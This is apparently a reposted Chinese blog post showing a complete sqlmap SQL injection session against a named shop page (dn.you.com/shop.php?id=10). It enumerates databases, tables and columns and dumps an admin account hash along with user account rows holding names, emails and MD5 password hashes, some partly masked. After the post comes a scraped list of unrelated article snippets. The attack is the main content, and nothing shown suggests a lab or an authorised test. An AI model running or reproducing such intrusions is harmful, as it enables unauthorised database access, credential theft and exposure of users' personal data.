root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dbs

available databases [8]:
[*] dntg
[*] dntg2
[*] dnweb
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
[*] ultrax

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-db
#当前数据库

current database:    'dnweb'

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --current-user
#当前数据库用户
current user:    'root@localhost'

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --table -D "dnweb"
#列数据库表名

Database: dnweb
[25 tables]
+-----------------+
| account         |
| admin_user      |
| base            |
| chajian         |
| chongzhi        |
| duihuan         |
| libao_jilu      |
| libao_list      |
| meirilibao      |
| meirilibao_jilu |
| mianfei         |
| mianfei_list    |
| money_name      |
| role_dellist    |
| roleid          |
| server          |
| shop_list       |
| shop_list_copy  |
| shop_tag        |
| tuiguang        |
| xiaofei         |
| zhuce           |
| zkfcn           |
| zkfcq           |
| zkfwp           |
+-----------------+

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --columns -T "admin_user"
#列名

Database: dnweb
Table: admin_user
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| admin_name | varchar(20) |
| admin_pass | varchar(32) |
+------------+-------------+

root@kali:~# sqlmap -u http://dn.you.com/shop.php?id=10 -v 1 --dump -C "admin_name,admin_pass " -T "admin_user" -D "dnweb"
#列数据

Database: dnweb
Table: admin_user
[1 entry]
+------------+----------------------------------+
| admin_name | admin_pass                       |
+------------+----------------------------------+
| lok**      | a9ee8d24806ee22c2daad334****** |
+------------+----------------------------------+

Database: dnweb
Table: account
[20 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| createtime | datetime     |
| dlts       | int(11)      |
| email      | varchar(255) |
| gold       | int(10)      |
| id         | int(10)      |
| jifen      | int(10)      |
| lastip     | varchar(16)  |
| logintime  | datetime     |
| lxdl       | int(11)      |
| money      | int(10)      |
| money2     | int(10)      |
| name       | varchar(32)  |
| namemd5id  | varchar(32)  |
| password   | varchar(32)  |
| regip      | varchar(16)  |
| security   | varchar(32)  |
| tg         | int(10)      |
| tg2        | int(10)      |
| tingyong   | int(11)      |
| vip        | int(255)     |
+------------+--------------+

+-------+------------+-------------+----------------------------------+----------+
| id    | email      | name        | password                         | security |
+-------+------------+-------------+----------------------------------+----------+
| 11827 | 13350*     | a414409798  | cee4fce6eaa87581421c296cbc0d3064 | NULL     |
| 11828 | 000000     | lo***       | 670b14728ad9902aecba32e22fa4f6bd** | NULL     |
| 11829 | 8888*       | q139818572* | 4607e782c4d86fd5364d7e4508bb10d9 | NULL     |
| 11830 | 123456     | 203412594*  | cfd40caa535bb51378ab60849bb54486 | NULL     |
| 11831 | 123456789  | na101*      | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11832 | NULL       | hyt100*     | 4c49c824492864666980b012bcf17d08 | NULL     |
| 11833 | 32312*     | hehe52121*  | 0733f98f76375074a3424d5b6e8ffd68 | NULL     |
| 11834 | 123456789* | fong201*    | 2798ba5d7c1b4f6eec30c9a9cad51dca | NULL     |
| 11835 | 123456     | q50504*     | e10adc3949ba59abbe56e057f20f883e | NULL     |
| 11836 | 1*          | wf199*      | 96e79218965eb72c92a549dd5a330112 | NULL     |
+-------+------------+-------------+----------------------------------+----------+

转载于:https://www.cnblogs.com/staffyoung/p/5424421.html

某网SQL注入漏洞实战相关推荐

  1. 凤凰网php,凤凰网某应用sql注入漏洞_MySQL

    凤凰网某应用sql注入漏洞 凤凰新闻手机app的一个api接口过滤不严,存在注入漏洞. 注入点:http://api.iapps.ifeng.com/news/upgrade.json?gv=4.2. ...

  2. 动网 php v1.0 漏洞,动网论坛dispuser.php页面SQL注入漏洞

    受影响系统: 动网论坛 Dvbbs php 2.0++ 描述: DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序. 在DVBBS的dispuser.php文件中: if( ...

  3. 126disk网盘sql注入漏洞

    2019独角兽企业重金招聘Python工程师标准>>> sql注入点有很多,有用户登录注入,如万能密码 admin' or 1=1-- :还有Web程序中的一些交互注入,如查询之类. ...

  4. 优酷网 存在sql注入漏洞

    漏洞详情 披露状态: 2010-07-21: 细节已通知厂商并且等待厂商处理中 1970-01-01: 厂商已经确认,细节仅向厂商公开 1970-01-11: 细节向核心白帽子及相关领域专家公开 19 ...

  5. SQL注入漏洞攻防必杀技

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上 对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻 ...

  6. [转]SQL注入漏洞攻防必杀技

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上 对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻 ...

  7. SQL注入漏洞,攻防必杀技!

    SQL注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击 ...

  8. SQL注入漏洞的检测与防范技术

    提 要   本文从SQL注入的基本概念和注入原理入手,分析总结了SQL注入漏洞的检测及其防范技术措施. 关键词  SQL注入漏洞 检测 防范技术 引 言    近几年来随着计算机网络和WEB技术的飞速 ...

  9. php网站漏洞检测对sql注入漏洞防护

    近日,我们SINE安全对metinfo进行网站安全检测发现,metinfo米拓建站系统存在高危的sql注入漏洞,攻击者可以利用该漏洞对网站的代码进行sql注入攻击,伪造恶意的sql非法语句,对网站的数 ...

最新文章

  1. linux 判断网卡类型 有线 无线
  2. VS2008下利用#pragma comment屏蔽VC/VS生成的exe程序的CMD窗口
  3. 如何在管理员页面查看知识星球活跃度和更多明细
  4. python找出录取率最高的年份_Python分析42年高考数据,告诉你高考为什么这么难?...
  5. 转载------工作10年的人总结的6句话
  6. 【初始化】神经网络到底该如何初始化?吴恩达Deeplearning.ai最新干货|湾区人工智能...
  7. ElemengUI:轮播图组件高度设置为全屏
  8. MongoDB数据库操作和程序基础文档
  9. 中国地图着色问题c语言,中国地图四色染色问题.doc
  10. Hbuilder:实现阴影透明背景特效
  11. 换掉7z-zip默认的ico图标,自定义压缩文件图标更美观。
  12. 电脑自动跳转加QQ好友html,自动添加QQ好友.html
  13. 十进制转二进制c语言递归,【数据结构】求十进制转二进制的递归算法
  14. python cls方法_Python 中的 __new__(cls)方法详解
  15. promise.then返回结果几种情况
  16. unity 麻将 用于打出去牌后在桌面相应的位置生成发出去的牌
  17. Python笔记---常用正则表达式练习
  18. 用户信息管理的功能开发
  19. jade支持html,Jade !HTML框架
  20. Java --- HtmlUnit 简介

热门文章

  1. ANDROID开发之SQLite详解
  2. shell实例第16讲:猜拳游戏
  3. STM32串口使用详解
  4. Byte和bit的区别?
  5. 剑指offer十一:二进制中1的个数
  6. 按阅读习惯来高效排列字符串的脚本
  7. Maven学习(一)——Maven入门
  8. java.util.regex.PatternSyntaxException: Unexpected internal error near index 1 \ ^
  9. dotnet文件操作
  10. JavaScript电话号码正则